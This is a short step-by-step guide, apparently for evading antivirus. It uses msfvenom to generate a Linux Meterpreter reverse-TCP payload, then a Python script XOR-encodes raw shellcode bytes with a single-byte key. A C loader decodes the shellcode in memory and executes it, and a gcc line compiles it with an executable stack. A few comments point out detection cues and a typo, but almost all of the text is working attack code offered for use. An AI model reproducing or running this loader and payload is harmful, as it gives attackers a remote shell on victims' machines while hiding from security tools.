-
Generate the msfvenom payload in C format:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT EXITFUNC=thread -f c -
Encode it with xor.py. Full code:
# Encodes the raw shellcode in `buf` by XORing every byte with a single-byte key
# and prints the result as a C-style "\xNN" string for pasting into the loader below.
# The key here and the key in the C loader must be identical.
buf = bytearray([
0x6a, 0x39, 0x58, 0x0f, 0x05, 0x48, 0x85, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xff, 0x6a, 0x3c, 0x58,
0x0f, 0x05, 0x6a, 0x39, 0x58, 0x0f, 0x05, 0x48, 0x85, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xff, 0x6a,
0x3c, 0x58, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x6a, 0x09, 0x58, 0x99, 0xb6, 0x10, 0x48, 0x89, 0xd6,
0x4d, 0x31, 0xc9, 0x6a, 0x22, 0x41, 0x5a, 0xb2, 0x07, 0x0f, 0x05, 0x48, 0x85, 0xc0, 0x78, 0x51,
0x6a, 0x0a, 0x41, 0x59, 0x50, 0x6a, 0x29, 0x58, 0x99, 0x6a, 0x02, 0x5f, 0x6a, 0x01, 0x5e, 0x0f,
0x05, 0x48, 0x85, 0xc0, 0x78, 0x3b, 0x48, 0x97, 0x48, 0xb9, 0x02, 0x00, 0x05, 0x39, 0xc0, 0xa8,
0x76, 0x03, 0x51, 0x48, 0x89, 0xe6, 0x6a, 0x10, 0x5a, 0x6a, 0x2a, 0x58, 0x0f, 0x05, 0x59, 0x48,
0x85, 0xc0, 0x79, 0x25, 0x49, 0xff, 0xc9, 0x74, 0x18, 0x57, 0x6a, 0x23, 0x58, 0x6a, 0x00, 0x6a,
0x05, 0x48, 0x89, 0xe7, 0x48, 0x31, 0xf6, 0x0f, 0x05, 0x59, 0x59, 0x5f, 0x48, 0x85, 0xc0, 0x79,
0xc7, 0x6a, 0x3c, 0x58, 0x6a, 0x01, 0x5f, 0x0f, 0x05, 0x5e, 0x6a, 0x7e, 0x5a, 0x0f, 0x05, 0x48,
0x85, 0xc0, 0x78, 0xed, 0xff, 0xe6
])
xor_key = ord('J')  # Convert the character 'J' to its ASCII code (0x4A); the C loader uses the same literal
encoded_payload = ""
for byte in buf:
    # Single-byte XOR is its own inverse, so the loader recovers buf by repeating this step.
    # "{:02X}" zero-pads to two uppercase hex digits so every byte becomes exactly one "\xNN".
    encoded_payload += "\\x{:02X}".format(byte ^ xor_key)
print(encoded_payload)
- Use the following code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// Our obfuscated shellcode: the "\xNN" string printed by xor.py, stored as a
// writable global array so it can be decoded in place by main(). The "..." in
// the middle is an elision in this listing, not part of the literal.
// NOTE(review): "...x32" in the listing is missing its backslash; the real
// literal must read "\x32" there or the compiler will see the bytes '.', 'x', '3', '2'.
unsigned char buf[] = "\x20\x73\x12\x45\x4F\x02\xCF\x8A...x32\x71\x02\xDD\x02\xF3\x48";
// Decodes buf in place with the same single-byte XOR key used by xor.py and
// then transfers control to it. Decode-then-jump through a function pointer
// cast from a data buffer is the pattern to look for when reviewing code like
// this; the executable-stack link flag on the gcc line below is what it relies
// on to make that data region executable (presumably via the GNU_STACK flag —
// verify on the target toolchain), and that flag is itself visible in the ELF headers.
int main (int argc, char **argv)
{
char xor_key = 'J'; // must be the same key xor.py used ('J' == 0x4A)
int arraysize = (int) sizeof(buf); // counts every byte of the initializer, including the trailing NUL
for (int i=0; i<arraysize-1; i++) // -1 so the string terminator is left alone
{
buf[i] = buf[i]^xor_key; // XOR is its own inverse; this restores the original byte
}
int (*ret)() = (int(*)())buf; // reinterpret the decoded data buffer as a function
ret(); // no return value is checked; whatever happens after the call depends on the payload
}
- In Kali, run:
gcc -o hack.out hack.c -z execstack